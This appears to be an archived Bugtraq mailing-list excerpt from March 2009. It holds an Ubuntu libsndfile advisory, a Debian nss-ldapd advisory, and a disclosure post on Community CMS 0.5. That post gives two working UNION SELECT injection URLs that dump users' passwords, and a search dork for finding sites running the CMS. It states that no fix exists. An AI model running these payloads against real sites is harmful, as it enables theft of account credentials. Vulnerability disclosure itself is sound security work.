===========================================================
Ubuntu Security Notice USN-749-1 March 30, 2009
libsndfile vulnerability
CVE-2009-0186
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libsndfile1 1.0.12-3ubuntu1.1
Ubuntu 7.10:
libsndfile1 1.0.17-4ubuntu0.7.10.1
Ubuntu 8.04 LTS:
libsndfile1 1.0.17-4ubuntu0.8.04.1
Ubuntu 8.10:
libsndfile1 1.0.17-4ubuntu0.8.10.1
After a standard system upgrade you need to restart your session to effect
the necessary changes.
Details follow:
It was discovered that libsndfile did not correctly handle description
chunks in CAF audio files. If a user or automated system were tricked into
opening a specially crafted CAF audio file, an attacker could execute
arbitrary code with the privileges of the user invoking the program.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12-3ubuntu1.1.diff.gz
Size/MD5: 5749 89e5a304266bb6a29a47e1b9ebae31a8
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12-3ubuntu1.1.dsc
Size/MD5: 651 2fbd2934afd83f1c3ab6b4258a269881
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12.orig.tar.gz
Size/MD5: 798471 03718b7b225b298f41c19620b8906108
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_amd64.deb
Size/MD5: 308302 74265d5248f39ad6d8c97576067c30ca
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_amd64.deb
Size/MD5: 179406 0014dc31d5b53d643c2ecbce36b4b5c3
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_amd64.deb
Size/MD5: 63950 609ed2d20822109f2d6d0098d7618ddb
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_i386.deb
Size/MD5: 300372 2874cf5301cb2e076337bd9e5f2f0302
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_i386.deb
Size/MD5: 182560 61b33c31ed3f4838ae43deb2285af54c
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_i386.deb
Size/MD5: 63840 02c9da91983dd14f3e7112f1a454482d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_powerpc.deb
Size/MD5: 331956 fc4744c453f92382096fe1095637a0a9
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_powerpc.deb
Size/MD5: 196006 a7bfb57e3aa4e304607bd362e90d2654
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_powerpc.deb
Size/MD5: 69426 8130044b011566cde96f8e1bd9885f26
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_sparc.deb
Size/MD5: 323784 a28aa32c141e121b7df3640da3a458c5
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_sparc.deb
Size/MD5: 197884 565658beff769c2fdaa3c2da2b43cc68
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_sparc.deb
Size/MD5: 64316 084607cd611593dd47a92d1dacc4e564
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.7.10.1.diff.gz
Size/MD5: 10204 26d89a562b90f5148023bacd3ce51e65
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.7.10.1.dsc
Size/MD5: 824 40af011aba04502d6c67851224a60d7b
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17.orig.tar.gz
Size/MD5: 819456 2d126c35448503f6dbe33934d9581f6b
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_amd64.deb
Size/MD5: 334950 4f76034f136dc4c5fcbb9e70bd4f6c14
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_amd64.deb
Size/MD5: 190798 78f8525d14ea7d3029515ed3366b736b
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.7.10.1_amd64.deb
Size/MD5: 73042 5e32ad10957a80656227990cf62ba58c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_i386.deb
Size/MD5: 326206 773cd34c6c7aa9763077dc89234c3807
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_i386.deb
Size/MD5: 198010 646b1a82e269a0b540cc21836299228d
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.7.10.1_i386.deb
Size/MD5: 73082 bfcacb225ef0a20eb0ba0552d43d4395
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_lpia.deb
Size/MD5: 324588 198d74f38c0bfb834c530a949233b291
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_lpia.deb
Size/MD5: 195562 08820d83bc9ab34c75d1af411a19ad8e
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.7.10.1_lpia.deb
Size/MD5: 73190 47df865379c3e4c77c95f74d149cacc4
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_powerpc.deb
Size/MD5: 359880 ab2f98bff652541c4779958fe6b8d888
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_powerpc.deb
Size/MD5: 212254 693582ab87c124aafcfdc75a72d4900d
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.7.10.1_powerpc.deb
Size/MD5: 81016 fef73edefd3d195f91b6b773c5e98a98
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_sparc.deb
Size/MD5: 347748 389eaee81f55ae9e4cbf57c824fad9f4
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_sparc.deb
Size/MD5: 211030 c6bc38a625257f23c8d89d23d198c08a
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.7.10.1_sparc.deb
Size/MD5: 73704 4f97ea9fb3655bdfce7b9b612dc9845b
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.8.04.1.diff.gz
Size/MD5: 10204 6bc4313cdd84ecfaab4e9bd6ef8a5512
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.8.04.1.dsc
Size/MD5: 824 15f0740faee7bcdcdcb5cc18b0baa3e4
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17.orig.tar.gz
Size/MD5: 819456 2d126c35448503f6dbe33934d9581f6b
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.04.1_amd64.deb
Size/MD5: 332910 ec4134faee04f9f0837aaf5f6e7328b7
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.04.1_amd64.deb
Size/MD5: 191128 63640e6095d6795c24fb9d548d3a9233
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.04.1_amd64.deb
Size/MD5: 72998 e5154c7ff1d17d55c553cc91e72f53e3
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.04.1_i386.deb
Size/MD5: 324578 4c4c3cf62645e7fbb62f932690f0e6b1
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.04.1_i386.deb
Size/MD5: 198012 fa6255c0e74d83fb002a20a6cea1e745
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.04.1_i386.deb
Size/MD5: 73060 a596fb7e520ce178c9cc57a44350a5d2
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.04.1_lpia.deb
Size/MD5: 324316 c508aee72883b91502473eb449a17ebe
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.04.1_lpia.deb
Size/MD5: 195434 4ba5a1a36a0b0165c6d371e4b4d7f16b
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.04.1_lpia.deb
Size/MD5: 73174 ac440be0fce23a2c4bbdc65da2594cc3
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.04.1_powerpc.deb
Size/MD5: 358328 ccaef905c034bc0180cd6f788e3e51fe
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.04.1_powerpc.deb
Size/MD5: 211176 d956eabc911e7a762820b5425f93b778
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.04.1_powerpc.deb
Size/MD5: 81256 27d20c9322c5a173fa6e081bd25fdfbd
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.04.1_sparc.deb
Size/MD5: 344700 0db66235d1da30b20d6b8442e9dda4d0
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.04.1_sparc.deb
Size/MD5: 207526 bdd10965df1be4733c0836a0ebe0f2d7
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.04.1_sparc.deb
Size/MD5: 73724 66075286b40045b01d12bbfd8ff1d159
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.8.10.1.diff.gz
Size/MD5: 10163 7a97269e0d3539e3ba97a0d2180d548f
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.8.10.1.dsc
Size/MD5: 1246 0a4610351cb26ef8a6fe9928f79a47fe
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17.orig.tar.gz
Size/MD5: 819456 2d126c35448503f6dbe33934d9581f6b
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.10.1_amd64.deb
Size/MD5: 333414 f2c8be1a441fc05417d7565f9263f7f8
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.10.1_amd64.deb
Size/MD5: 191790 5f07d746d33ddc7b6c54e624bafb9b20
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.10.1_amd64.deb
Size/MD5: 73206 bfff044c1433b601043dfaa4dbd32a2e
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.10.1_i386.deb
Size/MD5: 325804 44a34d93aa28c3e81549dc9405e6997f
http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.10.1_i386.deb
Size/MD5: 197810 bd5ad51ab6b31d917b016a6097857b95
http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.10.1_i386.deb
Size/MD5: 72856 1001a6456c39d93805f9fb2eebb7f728
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.10.1_lpia.deb
Size/MD5: 326384 00fa39d8d58a742ee4a79afdb7f843b7
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.10.1_lpia.deb
Size/MD5: 195390 46c9f63cc2f1b251e53cd070a8cc6947
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.10.1_lpia.deb
Size/MD5: 72898 8a17cd0af180290cfd476b39f262c822
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.10.1_powerpc.deb
Size/MD5: 362670 bd7517006ec2c4707b1bf42ccc47a9ba
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.10.1_powerpc.deb
Size/MD5: 213816 bc209aacd8644b4259569f9ae1d15720
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.10.1_powerpc.deb
Size/MD5: 79556 9f2fbdebf0f4c9920c425d65982b09cc
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.8.10.1_sparc.deb
Size/MD5: 343436 da15fe706c292c838f772c52ff8273ed
http://ports.ubuntu.com/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.8.10.1_sparc.deb
Size/MD5: 207042 8eb0c549c8d02a9ab0c699b385422237
http://ports.ubuntu.com/pool/universe/libs/libsndfile/sndfile-programs_1.0.17-4ubuntu0.8.10.1_sparc.deb
Size/MD5: 74180 87379dae900f75991d796ea8d6fcd841
--=-fLf7T6R9o1+FeiOxQ0Oa
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAknRDzoACgkQLMAs/0C4zNptAQCfRUFLBqD4Rs/hKMOkS1LsZYyi
wGoAnjW46gdlbnLaTwJY59uSr79VwYMH
=hYTe
-----END PGP SIGNATURE-----
--=-fLf7T6R9o1+FeiOxQ0Oa--
From - Mon Mar 30 16:27:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dbc
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39874-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CBA16EC114
for <lists@securityspace.com>; Mon, 30 Mar 2009 16:17:19 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 18125236FAC; Mon, 30 Mar 2009 13:09:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19244 invoked from network); 30 Mar 2009 19:52:30 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:received:date:message-id:subject
:from:to:content-type;
bh=QXJeGc42YjkYx7mw5KjcL1wMjWsDIvKfYO5z940lGpA=;
b=M9wyFi4Jsoh2YchETJsveAzeT9lRqeU+AJl6oFnr5oxV2WttFToiQXXbS8EMVS0yih
bZrHcMWL5lq6+SaatxBZO6wWrj0Q93t+3RR8Xtd4qUkeMl4YpOX74vwDPI0odJKZLxd8
aM3EZgPUmmFBdh5ReaUmwy9131S6q3BMld2x0DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:date:message-id:subject:from:to:content-type;
b=G8n97xWDhWe6uY4TgBacZjSwynK2Dwa0UgftmKmtYIIgllklHz50NJdCG4K2z87d0+
dxwcOe1S0rUll80DGq5z7KZnKoUTvxrHjvAU0k7d18x3SY/uMni6+tx57e4pIPdESiDe
Tt1uTMd6pxBRihK2+nF6C2gCji6o4HgfFwhX8MIME-Version: 1.0
Date: Mon, 30 Mar 2009 21:55:45 +0200
Message-ID: <48317b000903301255m1f398525mcf433621dd8cbf9@mail.gmail.com>
Subject: Community CMS 0.5 Multiple SQL Injection Vulnerabilities
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>, str0ke <str0ke@milw0rm.com>
Content-Type: multipart/mixed; boundary 1636c5b2f0d8529804665b7783
Status:
--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Community CMS
[+] Version: 0.5
[+] Website:
http://sourceforge.net/projects/communitycms/
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] File affected: view.php, calendar.php
This bug allows a guest to view username and
password of a registered user.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT
1,2,username,password,5,6,7,8,9 FROM comcms_users
http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=US-ASCII;
name="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Disposition: attachment;
filename="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fsxky3lr0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDb21tdW5pdHkgQ01TClsrXSBWZXJzaW9uOiAwLjUKWytdIFdlYnNpdGU6IGh0
dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvY29tbXVuaXR5Y21zLwoKWytdIEJ1Z3M6IFtB
XSBNdWx0aXBsZSBTUUwgSW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERv
cms6IGludGV4dDoiUG93ZXJlZCBieSBDb21tdW5pdHkgQ01TIgpbK10gRGF0ZTogMzAgTWFyIDIw
MDkKClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10g
QXV0aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQ29udGFjdDogZS1tYWls
OiBkcm9zb3BoaWxheHh4QGdtYWlsLmNvbQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioKClsrXSBNZW51CgoxKSBCdWdzCjIpIENvZGUKMykgRml4CgoK
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEJ1
Z3MKCgotIFtBXSBTUUwgSW5qZWN0aW9uCgpbLV0gRmlsZSBhZmZlY3RlZDogdmlldy5waHAsIGNh
bGVuZGFyLnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gdmlldyB1c2VybmFtZSBhbmQK
cGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVzZXIuCgoKKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBsZSBTUUwg
SW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlldy5waHA/YXJ0aWNsZV9pZD0t
MSBVTklPTiBBTEwgU0VMRUNUIDEsMix1c2VybmFtZSxwYXNzd29yZCw1LDYsNyw4LDkgRlJPTSBj
b21jbXNfdXNlcnMKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/aWQ9MiZ2aWV3
PWV2ZW50JmE9LTEgVU5JT04gQUxMIFNFTEVDVCAxLDIsMyw0LDUsNiw3LENPTkNBVCh1c2VybmFt
ZSwgMHgzYSwgcGFzc3dvcmQpLE5VTEwsTlVMTCxOVUxMLDEyLDEzLE5VTEwgRlJPTSBjb21jbXNf
dXNlcnMlMjMKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKg=--001636c5b2f0d8529804665b7783--
From - Tue Mar 31 11:37:22 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006dd1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39876-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2F694EC0FF
for <lists@securityspace.com>; Tue, 31 Mar 2009 11:31:54 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 85B18237372; Tue, 31 Mar 2009 08:14:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23072 invoked from network); 30 Mar 2009 21:44:10 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 DSBL_ORG=ERR CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Mon, 30 Mar 2009 23:47:00 +0200
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090330214700.GA3699@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.180.59
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.68 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1758-1] New nss-ldapd packages fix information disclosure
Priority: urgent
Resent-Message-ID: <ZH4icUGVyLB.A.UdF.t3T0JB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 30 Mar 2009 21:47:25 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1758-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
March 30, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : nss-ldapd
Vulnerability : insecure config file creation
Problem-Type : local
Debian-specific: yes
CVE ID : CVE-2009-1073
Debian Bug : 520476
Leigh James that discovered that nss-ldapd, an NSS module for using
LDAP as a naming service, by default creates the configuration file
/etc/nss-ldapd.conf world-readable which could leak the configured
LDAP password if one is used for connecting to the LDAP server.
The old stable distribution (etch) doesn't contain nss-ldapd.
For the stable distribution (lenny) this problem has been fixed in
version 0.6.7.1.
For the unstable distribution (sid) this problem has been fixed in
version 0.6.8.
We recommend that you upgrade your nss-ldapd package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/n/nss-ldapd/nss-ldapd_0.6.7.1.dsc
Size/MD5 checksum: 996 31232235dc6d5e0abb448e56f5f6f8ad
http://security.debian.org/pool/updates/main/n/nss-ldapd/nss-ldapd_0.6.7.1.tar.gz
Size/MD5 checksum: 373338 4cf1160a9626c51ee584f5b66ae1d33a
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_alpha.deb
Size/MD5 checksum: 115612 13d15bd8992624a7c41dfdac3c307202
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_amd64.deb
Size/MD5 checksum: 116262 f994f9e688ce6b97a9dfa4df31fa8fd6
arm architecture (ARM)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_arm.deb
Size/MD5 checksum: 109704 d525a237c689e726bd4d5923d976c936
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_armel.deb
Size/MD5 checksum: 110092 aae74517ffb749d86835d9562cb08c6c
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_hppa.deb
Size/MD5 checksum: 115350 08874099547bab40079ecaf89230f478
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_i386.deb
Size/MD5 checksum: 109212 d8245739c6796420c11ed945f9300cfe
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_ia64.deb
Size/MD5 checksum: 135638 e3e749ec11135fe721a2ee92e2468ae4
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_mips.deb
Size/MD5 checksum: 110722 a06cf2942f801c1f9703e72ec0f8c7d5
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/n/nss-ldapd/libnss-ldapd_0.6.7.1_mipsel.deb
Size/MD5 checksum: 109942 dbd6bfe96097c33d55f1913e412e4768
powerpc architecture (PowerPC)
